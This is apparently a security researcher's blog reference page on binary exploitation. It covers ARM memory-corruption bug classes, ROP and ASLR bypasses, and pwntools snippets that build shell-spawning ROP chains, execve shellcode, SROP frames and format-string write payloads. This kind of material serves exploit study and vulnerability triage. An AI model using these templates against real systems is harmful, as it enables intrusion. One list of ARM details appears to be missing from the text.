from life import experience as wisdom

~/posts/Binary Exploitation Techniques

<<< 2026/Apr/24 · security, exploitation >>>
ARM exploitation fundamentals, modern mitigation bypasses and pwntools workflow for building and delivering payloads.

Most of the targets I work with at Talos are ARM-based embedded devices or stripped binaries with no symbols. When a fuzzer surfaces a crash, the next question is always the same: what class of bug is this, and can it be turned into something more than a denial of service. This page is the reference I keep open during that triage. It covers ARM architecture details, the vulnerability classes that come up most often and the pwntools calls I use to build and test payloads.

Overview

Binary exploitation turns software bugs (memory corruption, logic flaws, integer errors) into controlled execution. Modern targets combine multiple mitigations — ASLR, DEP/NX, stack canaries — so successful exploits chain techniques together rather than relying on a single primitive.

This page focuses on ARM exploitation concepts and the pwntools framework used to build and deliver payloads.

ARM architecture basics

ARM (Advanced RISC Machine) executes one instruction per CPU cycle on a 32-bit processor:

ARM64 (AArch64) extends this to 64-bit with a richer register set (x0–x30, sp, pc).

Vulnerability classes

Stack buffer overflow

Overflow a stack variable to overwrite the saved return address (or LR). When the function returns, execution redirects to attacker-controlled code. The key target on ARM is the saved LR or the saved PC value on the stack.

Heap buffer overflow

The heap holds dynamically allocated chunks. Overflowing a heap chunk can corrupt adjacent metadata or function pointers. Unlike a stack overflow, the payoff is not immediate at function return — it fires when the overwritten pointer is dereferenced. This makes heap exploits more timing-sensitive and layout-dependent.

Use-after-free (UAF)

A pointer is used after the memory it references has been freed. Exploitation steps:

  1. Trigger the free of the target heap object.
  2. Reclaim the freed region with attacker-controlled allocation.
  3. Prepare a ROP payload at a known address.
  4. Overwrite function pointers in the reclaimed chunk.
  5. Trigger the code path that dereferences the freed pointer.
  6. Control jumps to the ROP payload.

Summary: free → overwrite → use.

Off-by-one / one-byte overflow

Writing exactly one byte past a buffer boundary. On 32-bit ARM, corrupting the LSB of a saved stack pointer or frame pointer is enough to redirect control flow.

Integer overflow

Sizing and casting bugs — mixing short/int/long or signed/unsigned types — can produce an unexpectedly small allocation size. The caller then writes more data than the allocation can hold, overflowing into adjacent memory.

Bypassing mitigations

DEP / NX — Return Oriented Programming (ROP)

ROP chains small existing code sequences ("gadgets") that each end with a ret or equivalent. Since gadgets are in executable memory, NX is irrelevant. The chain is placed on the stack; redirecting PC to the first gadget drives execution through the sequence.

Runtime memory patching via ROP: overwrite a critical variable without injecting shellcode — useful when only a flag needs flipping.

ASLR

Two strategies: - Bruteforce: practical only on 32-bit (limited address space, ~16-bit entropy). - Information leak: read a pointer from process memory (e.g., via format string: %p leaks stack addresses). Compute the ASLR slide as leaked_address - static_address. Apply the slide to relocate any gadget or function.

pwntools reference

Process interaction

from pwn import *

p = process('./target')
p = remote('127.0.0.1', 1337)
p = process(['./target', '--arg'], env={'VAR': 'val'})

# Attach GDB to running process
gdb.attach(p)

# Start under GDB with ASLR disabled
p = gdb.debug('./target', aslr=False, gdbscript='b *main+123')

# I/O
p.send(b'data')           # write without newline
p.sendline(b'data')       # write with newline
p.recv(n)                 # read n bytes
p.recvline()              # read until \n
p.recvuntil('prompt')     # read until delimiter
p.sendlineafter('> ', b'payload')
p.interactive()           # hand control to terminal

Context

context.arch = 'aarch64'   # or 'arm', 'amd64', 'i386'
context.endian = 'little'  # or 'big'
context.log_level = 'info' # 'debug' | 'warn' | 'error'

Encoding and packing

# Integer  bytes (little-endian by default)
p32(0xdeadbeef)   # → b'\xef\xbe\xad\xde'
p64(0xcafebabe)
u32(b'\xef\xbe\xad\xde')  # → 0xdeadbeef

# Cyclic sequences to find offsets
cyclic(32)                      # → b'aaaabaaacaaa...'
cyclic_find(0x61616164)         # → 12  (byte offset)

ELF introspection

elf = ELF('./target')
elf.plt.puts          # address of puts@PLT
elf.got['puts']       # address of puts@GOT
elf.sym['main']       # symbol address

# Set base address after leaking it (for ASLR bypass)
libc = ELF('./libc.so.6')
libc.address = leaked_libc_base
libc.sym.puts         # now correctly rebased
bin_sh = next(libc.search(b'/bin/sh'))

ROP chain building

rop = ROP(elf)

# Find specific gadgets
pop_rdi = rop.rdi.address
syscall = rop.find_gadget(['syscall', 'ret']).address

# Build chain
rop.call(elf.sym.puts, [elf.got['puts']])   # leak puts address
rop.call(libc.sym.system, [bin_sh])          # shell

payload = b'A' * offset + rop.chain()

Shellcraft and assembly

shellcode = shellcraft.sh()          # /bin/sh via execve
payload = bytes(asm(shellcode))

# Or manually
shellcode = asm('''
    lea rdi, [rip+bin_sh]
    xor rsi, rsi
    xor rdx, rdx
    mov rax, SYS_execve
    syscall
bin_sh:
    .string "/bin/sh"
''')

SROP (Sigreturn ROP)

Used when gadget availability is limited. A sigreturn syscall restores a full register context from the stack, giving full control over all registers in one shot.

frame = SigreturnFrame()
frame.rax = constants.SYS_execve
frame.rdi = bin_sh_addr
frame.rsi = 0
frame.rdx = 0
frame.rip = syscall_addr
payload = b'A' * offset + p64(sigret_gadget) + bytes(frame)

Format string exploits

# Automated payload for arbitrary writes
writes = {target_addr: value}
payload = fmtstr_payload(offset, writes)

# Auto-detect offset
def send_data(payload):
    p.sendline(payload)
    return p.recvall()
fmt = FmtStr(execute_fmt=send_data)
offset = fmt.offset

What I reach for first

Stack buffer overflows are the starting point: straightforward offset calculation with cyclic, confirm PC control, then layer in a ROP chain to bypass NX. For targets where ASLR is the main obstacle, I look for a format string primitive first — a single %p leak often collapses the address space problem before anything else needs solving.

See also